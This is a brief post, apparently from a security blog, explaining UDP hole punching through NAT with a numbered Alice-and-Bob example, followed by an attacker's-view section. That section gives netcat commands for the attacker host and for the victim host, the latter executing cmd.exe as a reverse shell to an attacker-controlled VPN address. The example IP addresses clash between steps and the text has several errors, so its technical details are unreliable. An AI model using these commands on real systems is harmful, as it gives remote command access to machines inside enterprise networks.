Why it is useful?
Imagine two hosts: Alice and Bob that both located behind NAT. And they want to exchange some data... In TCP scheme you can't accomplish that without port forwarding, but with UDP...
This technique called UDP hole punching:
1. Alice sends packet to Bob's public IP, lets say 18.104.22.168, any statefull packet inspection (SPI) firewall will start session from Alice local host to 22.214.171.124:1234.
2. Bob's firewall will drop that packet.
3. Bob sends another packet to Alice's public IP, lets say 126.96.36.199:1234, and again Bob's SPI firewall will start session.
4. Woala! Alice got UDP packet from bob.
From now, both Alive and Bob have opened sessions and may communicate each other without interference.
How it may look from an attacker's view?
Easy. Hacker that stay behind of some kind VPN may get reverse shell on your local host in enterprise network.
On attacker host:
nc -up vpn_port attackerVPNpublicIP victim_source_port
On victim host:
nc -up victim_source_port attackerVPNpublicIP vpn_port -e c:\windows\system32\cmd.exe
Proof of Concept:
Any bittorrent client :)